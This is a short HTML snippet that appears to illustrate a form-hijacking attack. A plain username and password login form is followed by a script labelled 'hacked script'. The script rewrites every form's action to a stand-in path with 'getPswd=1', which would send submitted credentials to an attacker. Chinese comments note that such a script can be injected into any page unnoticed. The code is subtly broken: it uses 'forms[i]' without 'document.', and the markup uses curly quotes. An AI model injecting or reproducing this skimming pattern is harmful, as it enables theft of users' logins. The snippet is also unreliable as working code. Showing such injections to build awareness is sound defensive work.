<!--normal pages-->
<html>
<head>
</head>
<body>
<form action=”someapplication”>
<input type=”text” name=”username”/>
<input type=”password” name=”pswd”/>
<input type=”submit”/><input type=”reset”/>
</form>
</body>
</html> 
<!--normal ending-->

<!--hacked script-->
<script type=”text/javascript”>
	for(var i = 0; i < document.forms.length; i++)
	{
		forms[i].action = "//somepath/hackData!action?parser=stdForm&getPswd=1";
			//这段脚本可能会被用某些技术手段嵌入到任何你访问的页面上
			//除非你每访问一个页面都去小心翼翼地查看源代码
			//否则你很难注意到它的存在
	}
</script>
